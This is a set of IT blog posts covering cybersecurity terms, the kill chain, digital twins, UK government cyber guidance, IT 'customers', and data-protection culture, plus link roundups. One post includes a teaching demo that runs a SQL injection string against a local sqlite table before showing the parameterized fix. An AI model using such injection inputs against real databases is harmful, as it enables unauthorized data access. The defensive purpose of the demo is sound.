Now, while some of these correlations may seem self-evident, piecing them together and, more importantly, tracking them for trends and patterns can dramatically increase the number of well-informed, fact-based decisions, and that makes for a better IT environment.

In the first post of this blog series, we’ll cover the fundamentals of cybersecurity, and understanding basic terminology so you can feel comfortable “talking the talk.” Over the next few weeks, we’ll build on this introductory knowledge, and review more complex terms and methodologies that will help you build confidence in today’s ever-evolving threat landscape.


To start, here are some of the foundational terms and their definitions in the world of cybersecurity.


Risk: The potential for financial loss, disruption, or damage to an organization’s reputation resulting from some sort of failure of its information technology systems.


Threat: Any malicious act that attempts to gain access to a computer network without authorization or permission from the owners.


Vulnerability: A flaw in a system that can leave it open to attack. This refers to any type of weakness in a computer system, or an entity’s processes and procedures that leaves information security exposed to a threat.


Exploit: As a noun, it’s an attack on a computer system that takes advantage of a particular vulnerability that has left the system open to intruders. Used as a verb, exploit refers to the act of successfully perpetrating such an attack.


Threat Actor: Also known as a malicious actor, it’s an entity that is partially or wholly responsible for an incident that affects, or has the potential to affect, an organization's security. Examples of potential threat actors include: cybercriminals, state-sponsored actors, hacktivists, systems administrators, end-users, executives, and partners. Note that while some of these groups are obviously driven by malicious objectives, others may become threat actors through inadvertent compromise.


Threat Actions: What threat actors do or use to cause or contribute to a security incident. Every incident involves at least one action, and most comprise several. The Vocabulary for Event Recording and Incident Sharing (VERIS) defines seven threat action categories: Malware, Hacking, Social, Misuse, Physical, Error, and Environmental.


Threat Vector: A path or tool that a threat actor uses to attack the target.



Now let’s look at how these basic terms become part of a more complex cybersecurity model. You’ve probably heard about the Cyber Kill Chain. This model outlines the various stages of a potentially successful attack. The best-known version is the Lockheed Martin Kill Chain, which breaks an attack into the following phases.


Reconnaissance – Research, identification, and selection of targets, often represented as crawling internet websites, like social networks, organizational conferences, and mailing lists for email addresses, social relationships, or information on specific technologies.


Weaponization – Coupling a remote access Trojan with an exploit into a deliverable payload. Most commonly, application data files, such as PDFs or Microsoft Office documents, serve as the weaponized deliverable.


Delivery – Transmission of the weapon to the targeted environment via, for example, email attachments, websites, and USB removable media.


Exploitation – After payload delivery to victim host, exploitation triggers the intruders’ code. Exploitation targets an application or operating system vulnerability, or leverages an operating system feature that auto-executes code.


Installation – Installation of a remote access Trojan or backdoor on the victim system allows the adversary to maintain persistence inside the environment.


Command and Control – Advanced Persistent Threat (APT) malware typically establishes remote command and control channels so that intruders have “hands on the keyboard” access inside the target environment.


Actions on Targets – Typically the prime objective is data exfiltration, involving collecting, encrypting, and extracting information from the victim environment. Intruders may only seek access to a victim box for use as a jump point to compromise additional systems, and move laterally inside the network or attack other partner organizations.


The goal of any attack detection methodology is to identify a threat in as early a stage of the kill chain as possible. In subsequent blogs—as we build upon these foundational definitions and cover things such as attack surfaces and protection mechanisms—we will refer back to the phases of the kill chain when discussing certain threats, like malware and the role of protections such as IPS.


Note that as threat vectors have evolved and changed, the kill chain—although a good resource as a starting point—no longer covers all possibilities. This ensures that the job of a cybersecurity professional will never remain static.



The World Cup is over, but can France really be happy to win a tournament for which the USA didn't qualify?


As always, here are some links from the Intertubz that I hope will hold your interest. Enjoy!


Evaluating the Evaluation: A Benchmarking Checklist

Wonderful thoughts here on a checklist for benchmarks and scalability. I wish I could go back in time and hand this to some developers who struggled to get their code to scale.


Forget Legroom—Air Travelers Are Fed Up With Seat Width

Agreed, I’d prefer more width and elbow room. However, it’s legroom that really defines for me if I can work on my laptop. Paying for a business class seat should mean that you have room to work.


Unfollowing Everybody

I like this strategy, and I’ve done this a few times over the years. However, I’ve not thought about scripting it out, or using Excel to help drive my decisions about who to keep following.


Netflix Stuns HBO: Emmy Nominations by the Numbers

Reading this article made me realize that HBO and Netflix are clones of each other. Both companies were founded to provide media to our homes, one through cable and the other using the Post Office. Then both executed a pivot to be more than distributors: they started creating the content they distribute. And now Netflix takes the lead, mostly due to its data-driven culture.


Are we truly alone in the cosmos? New study casts doubt on rise of alien life in our galaxy

The Fermi Paradox doesn’t get talked about enough. Probably because it can be a bit depressing to realize we are alone.


Apple’s most expensive MacBook Pro now costs $6,700

If you were wondering what to get a Geek like me for Christmas.


Burglar stuck in Vancouver escape room panics, calls 911

Seriously though, those rooms can be tough, and you are usually allowed a hint or two. Maybe that’s why he called.


Humbled and honored to be selected as a Microsoft MVP for the tenth consecutive year.

By Paul Parker, SolarWinds Federal & National Government Chief Technologist


Here is an interesting article from my colleague Joe Kim, in which he discusses how technology drives military asset management.


Military personnel need to be able to easily manage the lifecycle of their connected assets, from creation to maintenance to retirement. They can do this by creating a digital representation of a physical object, like a troop transport, which they can use for a number of purposes, including monitoring the asset’s health status, movements, location, and more.


The concept behind these “digital twins” was first presented in 2002 during a University of Michigan presentation by Dr. Michael Grieves, who posited that there are two systems: one physical, the other a digital representation that contained all of the information about the physical system. His thought was that the digital twin could be used to monitor and support the entire life cycle of its physical sibling and, in the process, keep that sibling functioning and healthy.


Digitizing a vehicle


Consider a military vehicle that has just rolled off the assembly line and is ready to be commissioned.

Getting the most out of this asset requires consistent maintenance. Ideally, that maintenance can be performed proactively to prevent any potential breakdowns. It can be difficult to know or keep track of when the vehicle may need maintenance, and impossible to predict when a breakdown may occur.


Fortunately, the data collected by the various sensors contained within the vehicle can be used to create a digital twin. This representation can provide a very clear picture, in real time, of its status.

Further, by collecting this information over time, the digital twin has the ability to create an evolving yet extraordinarily accurate picture of how the vehicle will perform in the future. As the sensors continue to report information, the digital twin continues to learn, model, and adapt its prediction of future performance.


This information can help teams in a number of ways. The analytics derived from historical performance data can be used to point to potential warning signs and predict failures before they occur, thereby helping avoid unwanted downtime. Data can also be used to diagnose a problem and even, in some cases, solve the issue remotely. At the least, digital twins can be used to help guide soldiers and repair specialists to quickly fix the problem on the ground.
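As a rough illustration of that learn-and-predict loop, here is a toy Python sketch of a twin that builds a rolling baseline from sensor reports and flags readings that drift far from recent behavior. The class name, the temperature sensor, and the thresholds are all invented for illustration; real digital twins use far richer models than a rolling mean.

```python
from collections import deque
from statistics import mean, stdev

class EngineTwin:
    """Toy digital twin: learns a rolling baseline from sensor reports
    and flags readings that drift far from recent behavior."""

    def __init__(self, window=50, threshold=3.0):
        self.history = deque(maxlen=window)  # recent readings only
        self.threshold = threshold           # how many sigmas counts as anomalous

    def report(self, temperature):
        """Ingest one sensor reading; return True if it looks anomalous."""
        anomalous = False
        if len(self.history) >= 10:  # wait for enough data to form a baseline
            mu, sigma = mean(self.history), stdev(self.history)
            # A flat baseline (sigma == 0) is skipped for simplicity.
            if sigma > 0 and abs(temperature - mu) > self.threshold * sigma:
                anomalous = True
        self.history.append(temperature)
        return anomalous

twin = EngineTwin()
for t in [90, 91, 90, 92, 91, 90, 92, 91, 90, 91, 92, 90]:
    assert not twin.report(t)   # normal operating temperature
assert twin.report(140)         # sudden spike: flag for proactive maintenance
```

The value here is the shape of the workflow: the twin accumulates history, adapts its notion of "normal," and surfaces a warning before the physical sibling fails outright.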


The life cycle management process also becomes much more efficient. Digital twins can help simplify and accelerate management of a particular thing, in this case, a physical entity like a vehicle.


Taking the next step


The digital twin concept is a logical next step to consider for defense agencies that have already begun investing in software-defined services. These services are designed to simplify and accelerate the management of core technology concepts, including computing, storage, and networking. The idea is to improve the management of each of these concepts throughout their life cycles, from planning and design through production, deployment, maintenance, and, finally, retirement.


Digital twins take this concept a step further by applying it to physical objects. It’s an evolution for the military’s ever-growing web of connectivity. Digital twins, and the data analysis they depend on, can open the doors to more efficient and effective asset lifecycle management.


Find the full article on SIGNAL.

A recent conversation on Twitter struck a nerve with me. The person posited that,


"If you're a sysadmin, you're in customer service. You may not realise it, but you are there TO SERVE THE CUSTOMER. Sure that customer might be internal to your organisation/company, but it's still a customer!"


A few replies down the chain, another person posited that,


"Everyone you interact with is a customer."


I would like to respectfully (and pedantically) disagree.


First, let's clear something up: The idea of providing a "service," which could be everything from a solution to an ongoing action to consultative insight, and providing it with appropriate speed, professionalism, and reliability, is what we in IT should always strive to do. That doesn't mean (as other discussions on the Twitter thread pointed out) that the requester is always right; that we should drop everything to serve the requester's needs; that we must kowtow to the requester's demands. It simply means that we were hired to provide a certain set of tasks, to leverage our expertise and insight to help enable the business to achieve its goals.


And when people say, "you are in customer service" that is usually what they mean. But I wish we'd all stop using the word "customer." Here is why:


Saying someone is a customer sets up a collection of expectations in the mind of both the speaker and the listener that don’t reflect the reality of corporate life.


As an external service provider—a company hired to do something—I have customers who pay me directly to provide services. But I can prioritize which customers get my attention and which don’t. I can “fire” abusive customers by refusing to serve them; or I can prohibitively price my services for “needy” customers so that either they find someone else or I am compensated for the aggravation they bring me. I can choose to specialize in certain areas of technology, and then change that specialization down the road when it’s either not lucrative or no longer interesting to me. I can follow the market, or stay in my niche. These are all the things I can do as an external provider who has ACTUAL customers.


Inside a company, I can do almost none of those things. I might be able to prioritize my work somewhat, but at the end of the day I MUST service each and every person who requests my help. I cannot EVER simply choose to not help or provide service to a coworker. I can put them off, but eventually I have to get to their request. Since I’m not charging them anything, I can’t price my services in a way that encourages abusive requestors to go elsewhere. Even in organizations that have a chargeback system for IT services, that charge rate must be equal across the board. I can’t charge more to accounting and less to legal. Or more to Bob and less to Sarah. The services I provide internally are pre-determined by the organization itself. No matter how convinced I am that “the future is cloud,” I’m stuck building, racking, and stacking bare-metal servers in our data center until the company decides to change direction.


Meanwhile, for the person receiving those services, as a customer, there’s quite a range of options. Foremost among these is that I can fire a provider. I can put out an RFP and pick the provider who offers me the best services for my needs. I can haggle on price. I can set an SLA with monetary penalties for non-compliance. I can select a new technical direction, and if my current provider is not experienced, I can bring in a different one.


But as an internal staff requesting service from the IT department, I have almost none of those options. I can’t “fire” my IT department. Sure, I might go around the system and bring in a contractor to build a parallel, “shadow IT” structure. But at the end of the day, I’m going to need to have an official IT person get me into Active Directory, route my data, set up my database, and so on. There’s only so much a shadow IT operation can do before it gets noticed (and shut down). I can’t go down the street and ask the other IT department to give me a second bid for the same services. I can’t charge a penalty when my IT department doesn’t deliver the service they said they would. And if I (the business “decider”) choose to go a new technical route, I must wait for the IT department to catch up or bring in consultants NOT to replace my IT department, but to cover the gap until they get up to speed.


Whether we mean to or not, whether we like it or not, and whether you agree with me or not, I have found that using the word "customer" conjures at least some of those expectations.


But there’s one other giant issue when you use the word “customer,” and that’s the fact that people often confuse “customer” with “consumer.” That’s not an IT issue, that’s a life issue. The thing to keep in mind is that the customer is the person who pays for the service. The consumer is the person who receives (enjoys) the service. And the two are not always the same. I’m not just talking about taking my kids out to ice cream.


A great example is the NFL. According to Wikipedia, the NFL television blackout policies were, until they were largely overridden in 2014, the strictest among North American sports leagues. In brief, the blackout rules state that “…a home game cannot be televised in the team's local market if all tickets are not sold out 72 hours prior to its start time.” Prior to 1973, this blackout rule applied to all TV stations within a 75-mile radius of the game.


How is this possible? Are we, the fans, not the customers of football? Even if I’m not going to THIS game, I certainly would want to watch each game so that the ones I DO attend are part of a series of experiences, right?


The answer is that I’m not the customer. I’m the consumer. The customer is “the stadium” (the owners, the vendors, the advertisers). They are the ones putting up the money for the event, and they want to make their money back by ensuring sold-out crowds. The people who watch the game—whether in the stands or over the airwaves—are merely consumers.


In IT terms, the end-user is NOT the customer. They are the consumer. Management is the customer—the one footing the bill. If management says the entire company is moving to virtual desktops, it doesn’t matter whether the consumer wants, needs, or likes that decision.


So again, calling the folks who receive IT services a “customer” sets up a completely false set of expectations in the minds of everyone involved about how this relationship is going to play out.


However, there is another word within easy reach that describes the relationship far more accurately, and that creates the very behaviors we hope for when we (ill-advisedly) try to shoehorn “customer” into that spot. That word is: “colleague.”


A colleague is someone I collaborate with. Maybe not on a day-to-day basis or in terms of my actual activities, but we work together to achieve the same goal (in the largest sense, whatever the goals of the business are). A colleague is someone I can’t “fire,” replace, or put out to bid with another provider.


“Colleague” also creates the (very real) understanding that this relationship is long-term. Jane in the mailroom may become Jane in accounting, and later Jane the CFO. Through it all she remains my colleague. The relationship I build with her endures and my behavior toward her matters.


So, I’m going to remain stubbornly against using the word “customer” to refer to my colleagues. It de-values them and it de-values the relationship I want to have with them, and the one I hope they have with me.


Building a culture that favors protecting data can be challenging. In fact, most of us who love our data spend a huge amount of time standing up for our data when it seems everyone else wants to take the easiest route to getting stuff done. I can hear the pleas from here:


  • We don't have time to deal with SQL injection now. We will get to that later.
  • If we add encryption to this data, our queries will run longer. It will make the database larger, which will also affect performance. We can do that later if we get the performance issues fixed.
  • I don't want to keep typing out these long, complex passwords. They are painful.
  • Multi-factor authentication means I have to keep my phone near me. Plus, it's a pain.
  • Security is the job of the security team. They are a painful bunch of people.


…and so on. What my team members don't seem to understand is that these pain points are supposed to be painful. The locks on my house doors are painful. The keys to my car are painful. The PIN on my credit card is painful. All of these are set up, intentionally, as obstacles to access -- not my access, but unauthorized access. Why is it that team members who lock their doors, shred sensitive documents, and keep their collector action figures under glass don't want to protect the data we steward on behalf of customers? In my experience, these people don't want to protect data because they are measured, compensated, and punished in ways that take away almost all the incentives to do so. Developers and programmers are measured on the speed of delivery. DBAs are measured on uptime and performance. SysAdmins are measured on provisioning resources. And rarely have these roles been measured and rewarded for security and privacy compliance.
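Taking the first objection above as an example, deferring SQL injection fixes is rarely a real time-saver: the parameterized-query fix is usually a one-line change. Here is a minimal sketch using Python's built-in sqlite3 module, with an invented table and data, showing both the vulnerable and the safe version of the same query.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'top-secret')")

attacker_input = "nobody' OR '1'='1"

# Vulnerable: string concatenation lets the input rewrite the query.
leaked = conn.execute(
    "SELECT secret FROM users WHERE username = '" + attacker_input + "'"
).fetchall()
print(leaked)   # → [('top-secret',)] -- every row leaks

# Safe: a parameterized query treats the input as data, not SQL.
safe = conn.execute(
    "SELECT secret FROM users WHERE username = ?", (attacker_input,)
).fetchall()
print(safe)     # → [] -- no such user
```

The painful part isn't writing the safe query; it's auditing the code base for the unsafe ones, which is exactly the kind of deliverable worth measuring and rewarding.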


To Reward, We Must Measure


How do we fix this? We start rewarding people for data protection activities. And to reward people, we need to measure their deliverables, which include:


  • An enterprise-wide security policy and framework that includes specific measures at the data category level
  • Encryption design, starting with the data models
  • Data categorization and modeling
  • Test design that includes security and privacy testing
  • Proactive recognition of security requirements and techniques
  • Data profiling testing that discovers unprotected or under-protected data
  • Data security monitoring and alerting
  • Issue management and reporting


As for the rewards, they need to focus on the early introduction of data protection features and services. This includes reviewing designs and user stories for security requirements.


Then we get to the hard part: I'm of the opinion that specific rewards for doing what is already expected of me are over the top. But I recognize that this isn't always the best way to motivate positive action. Besides, as I will get into later in this series, the organizational penalties for failing to protect data may grow so large that a company simply cannot afford the lax data protection culture many of us have today. And we certainly don't want prison time to be the measurement that encourages data protection.


In this series, I'll be discussing data protection actions, why they are important, and how we can get better at protecting data. Until then, I'd love to hear about what, if any, data protection reward (or punishment) systems your organization has in place today.

I hope everyone had a wonderful holiday six-day weekend. The second half of the year has begun. There is still time to accomplish the goals you set at the start of the year.


As always, here are some links from the Intertubz that I hope will hold your interest. Enjoy!


London police chief ‘completely comfortable’ using facial recognition with 98 percent error rate

It would seem that a reasonable person would understand that this technology isn’t ready, and that having a high number of mistakes leads to a lot of extra work by the police.


Why Won’t Millennials Join Country Clubs?

Because they are too busy paying down ridiculous student debt and mortgages?


Spiders Can Fly Hundreds of Miles Using Electricity

And they can crawl inside your ear when you sleep. Anyway, sweet dreams kids!


Manual Work is a Bug

A bit long but worth the time. Always be automating.


MoviePass is running out of money and needs to raise $1.2 billion

For $10 a month you can watch $300 worth of movies, which explains why MoviePass is bleeding cash right now. But hey, don’t let a good business model get in the way of that VC money.


If You Say Something Is “Likely,” How Likely Do People Think It Is?

I am certain that probably 60% of Actuator readers are likely to enjoy this article half the time.


US nickels cost seven cents to make. Scientists may have a solution

Sadly, the answer isn’t “get rid of nickels.” I’m fascinated by the downstream implications of this, and why our government should care that vending machines were built on the assumption that coins would never change. Get rid of all coins, introduce machines that use cards and phones, and move into the 21st century, please.


How I spent my holiday weekend: building a fire pit, retaining wall, and spreading 3 cubic yards of pea stone. Who wants some scotch and s'mores?

By Paul Parker, SolarWinds Federal & National Government Chief Technologist


For the public sector to maintain a suitable level of cybersecurity, the U.K. government has implemented some initiatives to guide organizations on how to do so effectively. In June 2017, the National Cyber Security Centre (NCSC) rolled out four measures as part of the Active Cyber Defence (ACD) program to assist government departments and arms-length public bodies in increasing their fundamental cybersecurity.


These four measures intend to make it more difficult for criminals to carry out attacks. They include blocking malicious web addresses from being accessed from government systems, blocking fake emails pretending to be from the government, and helping public bodies fix security vulnerabilities on their websites. The fourth measure relates to spotting and taking down phishing scams from the internet when the NCSC spots a site pretending to be a public-sector department or business.


Government IT professionals must incorporate strategies and solutions that make it easier for them to meet their compliance expectations. We suggest an approach on three fronts.


Step 1: Ensure network configurations are automated


One of the things departments should do to comply with the government’s security expectations is to monitor and manage their network configuration statuses. Automating network configuration management processes can make it much easier to help ensure compliance with key cybersecurity initiatives. Device configurations should be backed up and restored automatically, and alerts should be set up to advise administrators whenever an unauthorized change occurs.
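As a rough sketch of that backup-and-alert workflow, here is a minimal Python example. The device name, config format, and `fetch_running_config` function are hypothetical placeholders; real tooling would pull configurations over SSH or a device API and raise alerts through a monitoring system rather than a print statement.

```python
from pathlib import Path

BACKUP_DIR = Path("config_backups")  # hypothetical backup location

def fetch_running_config(device):
    """Placeholder: in practice this would pull the config via SSH or an API."""
    return f"hostname {device}\ninterface eth0\n ip address 10.0.0.1/24\n"

def backup_and_check(device):
    """Back up the running config and report whether it changed
    since the last stored backup."""
    BACKUP_DIR.mkdir(exist_ok=True)
    current = fetch_running_config(device)
    path = BACKUP_DIR / f"{device}.cfg"
    if path.exists() and path.read_text() != current:
        # A real deployment would alert administrators here.
        print(f"ALERT: unauthorized change detected on {device}")
        changed = True
    else:
        changed = False
    path.write_text(current)  # store (or refresh) the backup
    return changed

backup_and_check("edge-router-01")  # first run simply creates the backup
```

Run on a schedule, a loop like this gives you both the restorable backups and the unauthorized-change alerts the guidance calls for.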


Step 2: Make reporting a priority


Maintaining strong security involves prioritizing tracking and reporting. These reports should include details on configuration changes, policy compliance, security, and more. They should be easily readable, shareable, and exportable, and include all relevant details to show that they remain up-to-date with government standards.


Step 3: Automate patches and stamp out suspicious activity


IT administrators should also incorporate log and event management tools to strengthen their security postures. Like a watchdog, these solutions are designed to watch for suspicious activity, and can notify administrators or take action when a potentially malicious threat is detected. This complements existing government safeguards like protected Domain Name System (DNS) and DMARC anti-spoofing.
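To give a minimal flavor of what such log and event management tools do under the hood, here is a hedged Python sketch that counts failed logins per source address and flags sources that cross a threshold. The log format, field names, and threshold are invented for illustration; commercial tools correlate many event types across many sources.

```python
import re
from collections import Counter

# Hypothetical log line format: "... Failed login for <user> from <ip>"
FAILED_LOGIN = re.compile(r"Failed login for (\S+) from (\S+)")
THRESHOLD = 5  # alert after this many failures from one source

def scan(log_lines):
    """Count failed logins per source IP; return sources over threshold."""
    failures = Counter()
    for line in log_lines:
        m = FAILED_LOGIN.search(line)
        if m:
            failures[m.group(2)] += 1
    return [ip for ip, n in failures.items() if n >= THRESHOLD]

logs = ["2018-07-01 Failed login for admin from 203.0.113.9"] * 6
logs += ["2018-07-01 Failed login for bob from 198.51.100.4"]
print(scan(logs))  # → ['203.0.113.9']
```

The single noisy source is flagged while the one-off failure is ignored, which is the basic pattern behind brute-force and suspicious-activity alerting.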


Implementing automated patch management is another effective way to help make sure that network technologies remain available, secure, and up-to-date. Government departments must stay on top of their patch management to combat threats and help maintain strong security. The best way to do this is to manage patches from a centralized dashboard.


Keeping up with the guidelines proposed in initiatives such as the ACD program can be a tricky and complicated process, but it doesn’t have to be that way. By integrating these simple but effective steps, government IT professionals are better positioned to efficiently follow the guidelines and up their security game, protecting not just themselves, but the government’s reputation.


Find the full article on Central Government.

Happy 4th of July! Holiday or not, the Actuator always delivers. I do hope you are taking the time to spend with family and friends today. You can come back and read this post later, I won’t mind.


As always, here are some links from the Intertubz that I hope will hold your interest. Enjoy!


Debugging Serverless Apps: from monitoring invocations to observing a system of functions

As our systems become more complex, it becomes more important than ever to start labeling everything we can. Metadata will become your most important data asset.


4 Types of Idle Cloud Resources That Are Wasting Your Money

Idle containers are likely a vampire resource in your cloud environment, along with a handful of other allocated resources that are only lightly used.


Dealing with the insider threat on your network

Buried in this article is this gem: “…security is not so much about monitoring the perimeter anymore; companies need to be looking on the inside - how communications are happening on the network, how systems are talking to each other and most importantly what are the users doing on the network.” This is why anomaly detection, built on top of machine learning algorithms, is the next generation of tooling to defend against threats.


LA Fitness, ‘Hotel California’ and the fallacy of digital transformation

The author uses LA Fitness as one example, but I know of dozens more. This scenario is very common: a company chooses to modernize only parts of its business. Usually, the part chosen is one that generates revenue, not the part that handles customer service.


Apple is rebuilding Maps from the ground up

Two interesting parts to this story. The first is the admission that Apple knew their Maps feature was going to be poor right from the start, but they knew they needed to launch something. The second is the way they are making an effort to collect data and respect user privacy at the same time.


Here's how Amazon is able to poach so many execs from Microsoft

The answer combines a dollar sign in front and lots of numbers after.


About 300K expected to visit Las Vegas for July 4th

With July 4th on a Wednesday, more and more people are thinking "WOOHOO, SIX DAY WEEKEND!"


Happy Independence Day! Here's a picture of me riding an eagle:


